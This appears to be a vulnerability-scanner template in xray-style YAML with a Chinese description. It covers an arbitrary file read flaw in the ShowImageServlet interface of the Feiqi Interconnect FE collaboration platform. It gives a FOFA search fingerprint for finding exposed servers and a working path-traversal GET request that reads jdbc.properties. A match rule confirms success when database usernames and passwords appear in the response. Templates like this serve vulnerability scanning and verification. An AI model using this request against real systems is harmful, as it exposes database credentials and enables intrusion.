漏洞描述
飞企互联 FE业务协作平台 ShowImageServlet 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件
FOFA: "flyrise.stopBackspace.js"
id: feiqi-fe-showimageservlet-fileread
info:
name: 飞企互联 FE业务协作平台 ShowImageServlet 任意文件读取漏洞
author: peiqi
severity: high
verified: true
description: |
飞企互联 FE业务协作平台 ShowImageServlet 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件
FOFA: "flyrise.stopBackspace.js"
reference:
- https://peiqi.wgpsec.org/wiki/webapp/飞企互联/飞企互联%20FE业务协作平台%20ShowImageServlet%20任意文件读取漏洞.html
tags: feiqi,fileread
created: 2023/08/13
rules:
r0:
request:
method: GET
path: /servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print
expression: response.status == 200 && response.body.bcontains(b'jdbc.user') && response.body.bcontains(b'jdbc.password')
expression: r0()